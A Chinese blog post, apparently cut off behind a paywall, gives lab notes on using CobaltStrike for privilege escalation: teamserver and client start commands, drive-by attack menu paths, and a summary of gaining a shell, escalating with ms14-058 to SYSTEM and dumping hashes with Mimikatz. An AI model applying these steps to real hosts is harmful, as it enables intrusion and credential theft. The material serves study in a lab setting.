CobaltStrike系列学习笔记——(二)提权
| 实验环境 | 系统 | IP地址 |
|---|---|---|
| CobaltStrike(服务器/客户端) | kali | 192.168.134.130 |
| 靶机 | win7 | 192.168.134.135 |
先来回顾上一节的内容
进入目录:
root@kali:~#cd cobaltstrike3.14/
启动服务器:
root@kali:~/cobaltstrike3.14#./teamserver 192.168.134.130 limbo
启动客户端:
root@kali:~/cobaltstrike3.14#java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
选择攻击的web驱动方式(这里采用主机文件的方式):
Attacks->Packages->HTML Application
选择攻击的web驱动方式(这里采用主机文件的方式):
Attacks->Web Drive-by->Host File
靶机使用cmd命令行执行如

本文是CobaltStrike系列学习笔记的第二部分,主要介绍如何利用CobaltStrike进行提权操作。通过启动服务器和客户端,选择Web Drive-by攻击并使用主机文件方式进行渗透。在靶机上获取shell后,调整心跳间隔以提高实验效率。尝试获取hash和运行Mimikatz时遇到权限不足的问题,通过右键菜单的‘Access->Elevate’选择ms14-058漏洞进行提权,最终成功获取SYSTEM权限,并能查看到用户主机hash。

最低0.47元/天 解锁文章
8084





